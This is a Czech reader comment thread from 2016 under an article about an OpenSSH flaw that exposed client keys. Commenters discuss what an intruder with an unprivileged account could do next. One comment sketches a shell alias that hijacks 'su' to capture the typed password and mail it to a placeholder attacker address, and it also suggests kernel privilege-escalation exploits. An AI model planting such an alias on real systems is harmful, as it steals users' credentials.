Vlákno názorů k článku OpenSSH obsahuje chybu umožňující ukrást klientské klíče od cmar - takže ak sa dostane na server tak len...

Článek je starý, nové názory již nelze přidávat.

15. 1. 2016 8:44

cmar (neregistrovaný)

takže ak sa dostane na server tak len ako uzivatel bez prav ... a nech teda potom háda to heslo na su :)
- Skok na další nový názor. K navigaci lze použít i klávesy N pro následující a P pro předchozí nový názor
15. 1. 2016 9:09

Zdenek Mazanec (neregistrovaný)

On bezny ucet uz v dnesni dobe skoro polovicni root, zvlast, pokud se dotycny vyzna. Tim chci rict, ze moznosti, jak lokalne eskalovat prava je mnohem vic nez jak se vzdalene "nejak" dostat do systemu.
Heslo na su by v takove situaci totiz hadal jen malokdo.

Ja pouzivam zaheslovany klic, i ssh mam povolene jen na vybrane adresy a rozhodne si nemyslim, ze bych byl v nejakem extra bezpeci, bohuzel.

Dneska je imo napichle skoro vsechno, aktivnima prvkama po ceste pocinaje a zasadnima lokalnima knihovnama (openssl, urco i dalsi) konce. Vzdyt co toho za posledni mesic vyplavalo... hrozne moc.
- Skok na další nový názor. K navigaci lze použít i klávesy N pro následující a P pro předchozí nový názor
15. 1. 2016 10:25

Jenda (neregistrovaný)

Pokud to není nějaký fakt hodně osekaný pseudoshell, tak může třeba

- zkusit nějaký local privilege escalation exploit na kernel, pár jich už bylo

- alias su="read .. | mail utocnik@ble"
- Skok na další nový názor. K navigaci lze použít i klávesy N pro následující a P pro předchozí nový názor
18. 1. 2016 15:35

Vít Šesták

Pokud píšeš takto interaktivně heslo, tak lze odposlechnout rytmus psaní kláves a z toho pak rekonstruovat heslo.

Vlákno názorů k článku OpenSSH obsahuje chybu umožňující ukrást klientské klíče od cmar - takže ak sa dostane na server tak len...

Dále u nás najdete

Zdravotní a sociální pojištění 2026 u OSVČ: Opět výrazný růst záloh

Agentní AI nakupování přichází. I do Česka

Množství údajů dle nařízení vlády k JMHZ mnohé překvapí

Odpovědnost za rozhodnutí zůstává na lidech AI navzdory

Jak funguje platforma IBM Power11?

Máte záložní plán, pokud byste chtěli odjet z ČR?

Kolik bude stát snížení záloh OSVČ? Každý tvrdí něco jiného

Chytré bio-nálepky změří infekci, hormony i markery rakoviny

Zapomínání může být příznakem mozkové mlhy. Jak se řeší?

Neudržel telefon, nemohl předpažit. Byla to mrtvice

Česká televize chystá projekt Tak moment pro mladé

Za bolestivou menstruaci někdy může endometrióza

HP chce propouštět a šetřit, argumentuje AI

Elektronický podpis: slabiny a možnosti přerazítkování

Je mi dobře, prášek si nevezmu. Lidé si nerozumně mění léčbu

Po Black Friday přichází Cyber Monday. Jaká je jeho historie?

Legitimní weby jsou zneužívány k manipulaci prohlížečů

Celková anestezie u zubaře bude na pojišťovnu, ale jen pro někoho

Nemocenská 2026. Spočítali jsme, kdo dostane za marodění víc

Pětina lidí leží v nemocnicích zbytečně, ale není je kam přemístit